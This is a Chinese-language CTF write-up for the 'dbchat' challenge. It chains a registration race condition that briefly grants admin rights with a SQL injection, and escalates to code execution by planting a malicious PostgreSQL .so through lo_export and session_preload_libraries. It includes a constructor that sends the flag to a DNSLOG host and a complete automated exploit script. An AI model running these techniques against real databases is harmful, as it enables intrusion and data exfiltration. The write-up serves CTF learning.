文章

CyKor CTF 2025 dbchat wp

最近事情有点多,上线写了一题就去忙其他的了(

dbchat

    def _generate_sql(self, prompt: str) -> (str, List):
        m = self._pattern.match(prompt)
        if not m:
            return None
        field = m.group("field").lower()
        name = m.group("name").strip()
        if field not in self.ALLOWED_FIELDS:
            return None
        sql = f"SELECT {field} FROM people WHERE name='{name}';"
        return sql

这里明显可以sql注入

但是需要admin权限

@app.route('/register', methods=['GET', 'POST'])
def register():
    if request.method == 'POST':
        data = request.get_json() or {}
        username = data.get('username', '')
        pw1 = data.get('password', '')
        pw2 = data.get('confirm_password', '')
        role = data.get('role', '')

        if not username:
            return jsonify(success=False, message='Please enter your ID'), 400
        if load_user(username):
            return jsonify(success=False, message='The ID is already in use'), 400
        if not pw1 or not pw2:
            return jsonify(success=False, message='Please enter your password'), 400
        if pw1 != pw2:
            return jsonify(success=False, message='Password does not match'), 400
        if role == 'admin':
            return jsonify(success=False, message='role can not be admin'), 400

        pw_hash = hash_password(pw1)
        save_user(username, pw_hash)
        msg = get_msg(username)
        rank = get_username_rank(username)
        ROLE.insert(rank, role)
        MSG.insert(rank, msg)
        return jsonify(success=True, message='Registration successful! Please log in.'), 201

但这里存在一个条件竞争问题

如果注册一个用户,用户的json会被立刻写进文件,但是此时ROLE 列表可能并未更新

def get_username_rank(username):
    username = str(username)
    files = [f for f in os.listdir(USERS_DIR) if f.endswith('.json')]
    files.sort()

    my_file = f"{username}.json"
    if my_file not in files:
        return None
    
    rank = files.index(my_file)
    return rank

这里的get_username_rank基于文件系统,如果让rank刚好为原来admin的rank但是ROLE 未更新,这时候可以短暂拥有admin权限

然后就是必须getshell才能读取flag

RUN gcc -o flag flag.c
RUN rm flag.c
RUN chmod 0111 flag

考虑写入并加载恶意so

#include "postgres.h"
#include "fmgr.h"
#include <stdlib.h>
#include <unistd.h>

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

void __attribute__((constructor)) init() {
    unsetenv("LD_PRELOAD");

    system("python3 -c \\"import subprocess, urllib.request, urllib.parse; flag = subprocess.check_output('/app/flag').decode().strip(); data = urllib.parse.urlencode({'flag': flag}); urllib.request.urlopen('<http://DNSLOG/?'> + data)\\"");
    system("/app/flag > /app/users/flag");
}

这里因为依赖问题,加载so后数据库可能崩溃,所以选择直接将flag发送出去

编译

gcc -I$(pg_config --includedir-server) -fPIC -shared -o hack.so hack.c
xxd -p hack.so | tr -d '\\n' > hack.hex

然后向/etc/postgresql/17/main/conf.d/写入配置文件

内容为

session_preload_libraries = '/app/users/hack.so'

然后用pg_reload_conf()重载配置

搓一个自动化脚本

import requests
import threading
import time

BASE_URL = "<http://localhost:5000>"

ANSWER = "no"

def register_thread(username, password):
    try:
        requests.post(f"{BASE_URL}/register", json={
            "username": username,
            "password": password,
            "confirm_password": password,
            "role": "user"
        })
    except:
        pass

def attack_thread(username, password, paylaod):
    global ANSWER
    s = requests.Session()
    login_url = f"{BASE_URL}/login"
    chat_url = f"{BASE_URL}/admin/chat"
    login_data = {"username": username, "password": password}
    chat_data = {"question": paylaod}
    
    start_time = time.time()
    while time.time() - start_time < 10:
        if ANSWER != "no":
            return
        try:
            login_resp = s.post(login_url, json=login_data)
            if login_resp.status_code == 200:
                chat_resp = s.post(chat_url, json=chat_data, allow_redirects=False)
                if chat_resp.status_code == 200:
                    try:
                        res_json = chat_resp.json()
                        answer = res_json.get('answer', '')
                        
                        print("ANSWER:  " + answer)
                        ANSWER = answer
            
                    except:
                        pass
                elif chat_resp.status_code == 302:
                    pass
        except Exception as e:
            pass

def attack(payload,username):
    password = "password123"

    payload = f"what is location of ' UNION ALL SELECT {payload} WHERE '1'='1 ?"

    t_att = threading.Thread(target=attack_thread, args=(username, password, payload))
    t_att.daemon = True
    t_att.start()
    
    time.sleep(1)
    
    t_reg = threading.Thread(target=register_thread, args=(username, password))
    t_reg.daemon = True
    t_reg.start()
    
    t_reg.join()
    t_att.join(timeout=2)

if __name__ == "__main__":
    with open("hack.hex") as f:
        hex = f.read()
    attack(f"lo_from_bytea(0, decode('{hex}', 'hex'))::text", "000")
    if ANSWER == "no":
        print("failed 1")
        exit(1)
    OID = ANSWER
    ANSWER = "no"  
    attack(f"lo_export({OID}, '/app/users/hack.so')::text", "001")
    ANSWER = "no"    
    attack("lo_from_bytea(0, decode('73657373696f6e5f7072656c6f61645f6c6962726172696573203d20272f6170702f75736572732f6861636b2e736f270a', 'hex'))::text", "002")
    if ANSWER == "no":
        print("failed 3")
        exit(1)
    OID = ANSWER
    ANSWER = "no"
    attack(f"lo_export({OID}, '/etc/postgresql/17/main/conf.d/zzz_hack.conf')::text", "003")
    if ANSWER == "no":
        print("failed 4")
        exit(1)
    ANSWER = "no"
    attack("pg_reload_conf()::text", "004")
    ANSWER = "no"
    attack("pg_read_file('/app/users/flag')::text", "005")

然后flag会被发送到DNSLOG平台

许可协议:  CC BY 4.0